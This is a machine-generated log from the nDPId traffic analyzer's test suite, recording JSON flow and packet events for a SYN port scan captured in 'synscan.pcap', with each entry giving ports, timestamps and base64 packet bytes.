+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"synscan.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"synscan.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsK+QAADAG7I6sEAAIQA2GNIzSDpndUoMYAAAAAGACBAAl9gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"synscan.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"synscan.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsbD8AACsGsTOsEAAIQA2GNIzSFGXdUoMYAAAAAGACEAAUKgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"synscan.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"synscan.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsX\/kAACUGw3msEAAIQA2GNIzSE9jdUoMYAAAAAGACCAActwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"synscan.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"synscan.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAs3xYAACYGQ1ysEAAIQA2GNIzSB+TdUoMYAAAAAGACDAAkqwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"synscan.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":48080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"synscan.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsbhsAAC8Gq1esEAAIQA2GNIzSu9DdUoMYAAAAAGACEABsvgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"synscan.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"synscan.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsIgMAADsG62+sEAAIQA2GNIzSTv7dUoMYAAAAAGACEADZkAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":349,"source":"synscan.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5963,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"synscan.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsyKUAACsGVM2sEAAIQA2GNIzSF0vdUoMYAAAAAGACEAARRAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"synscan.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"synscan.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsbzMAADQGpT+sEAAIQA2GNIzSBfTdUoMYAAAAAGACBAAumwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"synscan.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"synscan.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsq8MAADUGZ6+sEAAIQA2GNIzSBILdUoMYAAAAAGACCAAsDQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"synscan.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"synscan.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsphAAADsGZ2KsEAAIQA2GNIzSH5bdUoMYAAAAAGACEAAI+QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"synscan.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"synscan.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsMxUAADMG4l2sEAAIQA2GNIzSBBfdUoMYAAAAAGACEAAkeAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"synscan.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"synscan.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsHAEAADUG93GsEAAIQA2GNIzSBCTdUoMYAAAAAGACCAAsawAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"synscan.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2522,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"synscan.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/AsAADIGGmesEAAIQA2GNIzSCdrdUoMYAAAAAGACDAAitQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":356,"source":"synscan.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"synscan.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsgb0AADIGlLWsEAAIQA2GNIzSB\/7dUoMYAAAAAGACDAAkkQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"synscan.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"synscan.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAssgsAAC4GaGesEAAIQA2GNIzSDZTdUoMYAAAAAGACDAAe+wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"synscan.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"synscan.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAspfEAACcGe4GsEAAIQA2GNIzSCvvdUoMYAAAAAGACEAAdlAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"synscan.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"synscan.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsV3wAADYGuvasEAAIQA2GNIzSECHdUoMYAAAAAGACDAAcbgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":360,"source":"synscan.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"synscan.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsJLYAADoG6bysEAAIQA2GNIzSPoHdUoMYAAAAAGACDADuDQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"synscan.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"synscan.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAs2BIAADkGN2CsEAAIQA2GNIzSB9HdUoMYAAAAAGACCAAovgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"synscan.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"synscan.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsipYAACcGltysEAAIQA2GNIzSFf\/dUoMYAAAAAGACEAASkAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"synscan.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058781,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3827,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"synscan.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":1,"flow_last_seen":1278275058781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058781,"pkt":"ACYLMQczACWzv5HuCABFAAAs7gYAACcGM2ysEAAIQA2GNIzSDvPdUoMYAAAAAGACEAAZnAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"synscan.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058781,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"synscan.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":1,"flow_last_seen":1278275058781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058781,"pkt":"ACYLMQczACWzv5HuCABFAAAssBUAADsGXV2sEAAIQA2GNIzSDuHdUoMYAAAAAGACEAAZrgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":365,"source":"synscan.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5963,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"synscan.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsB84AADoGBqWsEAAIQA2GNIzTF0vdU4MZAAAAAGACDAAVQQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"synscan.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"synscan.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAs9uYAADUGHIysEAAIQA2GNIzTTv7dU4MZAAAAAGACCADhjQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"synscan.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":48080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 